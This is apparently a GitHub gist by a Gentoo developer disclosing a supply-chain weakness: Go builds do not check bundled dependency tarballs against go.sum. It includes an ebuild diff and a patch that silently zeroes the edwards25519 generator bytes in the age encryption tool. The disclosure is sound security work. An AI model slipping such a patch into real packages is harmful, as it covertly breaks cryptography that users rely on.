Last active
October 21, 2022 19:23
-
-
Save robbat2/82f4c208b6674e707081eda689096d55 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Gentoo Golang deps bundled injection PoC | |
| ---------------------------------------- | |
| Author: Robin H. Johnson <robbat2@gentoo.org> | |
| Date: 2022/10/21 | |
| Go build does not catch the injection of malicious code that might have been | |
| included in a deps tarball. | |
| $WORKDIR/age-1.0.0/go.sum (which is more-trusted, since it came from the age | |
| upstream), contains this entry: | |
| filippo.io/edwards25519 v1.0.0-rc.1 h1:m0VOOB23frXZvAOK44usCgLWvtsxIoMCTBGJZlpmGfU= | |
| But it's not verified against. | |
| --- age-1.0.0.ebuild 2022-10-18 10:57:23.978105615 -0700 | |
| +++ age-1.0.0-r1.ebuild 2022-10-21 12:13:21.152623754 -0700 | |
| @@ -2,7 +2,7 @@ | |
| # Distributed under the terms of the GNU General Public License v2 | |
| EAPI=7 | |
| -inherit go-module | |
| +inherit go-module eutils | |
| DESCRIPTION="A simple, modern and secure encryption tool (and Go library)" | |
| HOMEPAGE="https://github.com/FiloSottile/age" | |
| @@ -18,6 +18,14 @@ | |
| BDEPEND="dev-go/gox" | |
| +src_prepare() { | |
| + default_src_prepare | |
| + cd "${WORKDIR}" | |
| + # What if this patch was silently inside the deps tarball, injected when | |
| + # the deps tarball was created | |
| + eapply "${FILESDIR}"/bypass-gosum.patch || die | |
| +} | |
| + | |
| src_compile() { | |
| go build -ldflags "-X main.Version=${PV}" -o . filippo.io/age/cmd/... || die | |
| } | |
| --- /dev/null 2022-08-29 08:27:45.548861310 -0700 | |
| +++ files/bypass-gosum.patch 2022-10-21 12:12:21.099943010 -0700 | |
| @@ -0,0 +1,18 @@ | |
| +--- ../go-mod/filippo.io/edwards25519@v1.0.0-rc.1/edwards25519.go.orig 2022-10-21 12:06:23.315437993 -0700 | |
| ++++ ../go-mod/filippo.io/edwards25519@v1.0.0-rc.1/edwards25519.go 2022-10-21 12:06:44.883308555 -0700 | |
| +@@ -76,10 +76,11 @@ | |
| + // generator is the canonical curve basepoint. See TestGenerator for the | |
| + // correspondence of this encoding with the values in RFC 8032. | |
| ++// Demo of malicious code injection; changing magic bytes in crypto code undetected... | |
| + var generator, _ = new(Point).SetBytes([]byte{ | |
| +- 0x58, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, | |
| +- 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, | |
| +- 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, | |
| +- 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66, 0x66}) | |
| ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, | |
| ++ 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}) | |
| + | |
| + // NewGeneratorPoint returns a new Point set to the canonical generator. | |
| + func NewGeneratorPoint() *Point { |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment